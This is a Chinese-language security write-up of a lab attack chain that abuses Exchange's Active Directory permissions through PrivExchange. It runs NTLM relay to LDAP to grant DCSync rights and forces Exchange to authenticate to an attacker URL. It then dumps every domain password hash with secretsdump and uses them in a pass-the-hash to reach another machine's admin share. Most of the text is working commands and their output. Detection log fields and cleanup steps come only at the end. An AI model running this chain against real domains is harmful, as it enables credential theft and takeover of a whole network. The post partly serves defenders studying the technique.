exchange漏洞遇上DCShadow
簡介
在大多數使用Active Directory和Exchange的組織中,Exchange伺服器具有如此高的許可權,即Exchange伺服器上的管理員足以升級到域管理員。此文章含有利用方法和攻擊日誌、及帳號恢復。
攻擊note
# 開啟 中繼 服務 root@kali:/opt/impacket# python ntlmrelayx.py -t ldap://192.168.136.2 --escalate-user extest Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections quested path: /privexchange/ [*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Client requested path: /privexchange/ [*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED [*] User privileges found: Create user[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Client requested path: /privexchange/ [*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Client requested path: /privexchange/ [*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2 [*] HTTPD: Client requested path: /privexchange/ [*] HTTPD: Client requested path: /privexchange/ [*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED [*] User privileges found: Create user [*] User privileges found: Adding user to a privileged group (Enterprise Admins) [*] User privileges found: Modifying domain ACL [*] Querying domain security descriptor [*] Success! User extest now has Replication-Get-Changes-All privileges on the domain [*] Try using DCSync with secretsdump.py and this user :) [*] User privileges found: Create user [*] User privileges found: Adding user to a privileged group (Enterprise Admins) [*] User privileges found: Modifying domain ACL [-] ACL attack already performed. Refusing to continue [*] User privileges found: Create user [*] User privileges found: Adding user to a privileged group (Enterprise Admins) [*] User privileges found: Modifying domain ACL [-] ACL attack already performed. Refusing to continue # 攻擊exchange root@kali:/opt/PrivExchange# python privexchange.py-ah 192.168.135.88 mail.one.com -u extest -d one.corp Password: INFO: Using attacker URL: http://192.168.135.88/privexchange/ INFO: Exchange returned HTTP status 200 - authentication was OK INFO: API call was successful # 用DCShadow 獲取域使用者hash root@kali:/opt/impacket19# python secretsdump.pyone/[email protected] -just-dc Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets one.corp\administrator:500:xxxxxxxxx:xxxxxxxxx::: Guest:501:xxxxxxxxx:xxxxxxxxx::: krbtgt:502:xxxxxxxxx:xxxxxxxxx::: DefaultAccount:503:xxxxxxxxx:xxxxxxxxx::: one.corp\ocsadmin:1110:xxxxxxxxx:xxxxxxxxx::: one.corp\jack.ma:1138:xxxxxxxxx:xxxxxxxxx::: one.corp\tong.wu:1142:xxxxxxxxx:xxxxxxxxx::: one.corp\chongxin.cai:1143:xxxxxxxxx:xxxxxxxxx::: one.corp\yongming.wu:1145:xxxxxxxxx:xxxxxxxxx::: one.corp\changwei.ma:1147:xxxxxxxxx:xxxxxxxxx::: one.corp\shan.dai:1152:xxxxxxxxx:xxxxxxxxx::: one.corp\jianhang.jin:1153:xxxxxxxxx:xxxxxxxxx::: ………… ……
hash注入
# 獲取hash後利用wce進行hash注入入侵任意帳號 C:\Users\C\Desktop\wce_v1_42beta_x32>wce -s changwei.ma:one.corp:xxxxxxxxx:xxxxxxxxx WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help. Changing NTLM credentials of current logon session (0008DE07h) to: Username: changwei.ma domain: one.corp LMHash: xxxxxxxxx NTHash: xxxxxxxxx NTLM credentials successfully changed! C:\Users\C\Desktop\wce_v1_42beta_x32>dir \\macw-pc\c$ 驅動器 \\macw-pc\c$ 中的卷是 Windows 卷的序列號是 18A3-83B0 \\macw-pc\c$ 的目錄 2018/04/12 週四07:38<DIR>PerfLogs 2018/12/20 週四14:08<DIR>Program Files 2019/01/16 週三11:21<DIR>Program Files (x86) 2019/01/10 週四10:32<DIR>Servyou 2018/11/29 週四14:36<DIR>Users 2019/01/08 週二15:15<DIR>Windows 2 個檔案33,165,918 位元組 7 個目錄 188,092,211,200 可用位元組
日誌分析
{ "computer_name": "DC06.one.corp", "event_data": { "AccessList": "%%7688\n\t\t\t\t", "AccessMask": "0x100", "AdditionalInfo": "-", "HandleId": "0x0", "ObjectName": "%{d0e4b839-7da5-4f94-8cb0-920f4ce499a9}", "ObjectServer": "DS", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "OperationType": "Object Access", "Properties": "%%7688\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "SubjectDomainName": "ONE", "SubjectLogonId": "0x3d857e", "SubjectUserName": "extest", "SubjectUserSid": "S-1-5-21-1528638276-348772823-1382602710-14867" }, "event_id": 4662, "keywords": [ "稽核成功" ], "level": "資訊", "log_name": "Security", "opcode": "資訊", "process_id": 664, "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", "record_number": "250045996", "source_name": "Microsoft-Windows-Security-Auditing", "task": "目錄服務訪問", "thread_id": 760, "type": "wineventlog" } // 根據objectType 或者 AccessList 來做告警
恢復
在 one.corp 林的屬性-安全選項卡會多出 extest使用者,並且具有 複製目錄更改和複製目錄更改所有項許可權 ,去掉許可權並刪除extest使用者
引用
-
DCShadow攻擊技術分析
-
abusing-exchange-one-api-call-away-from-domain-admin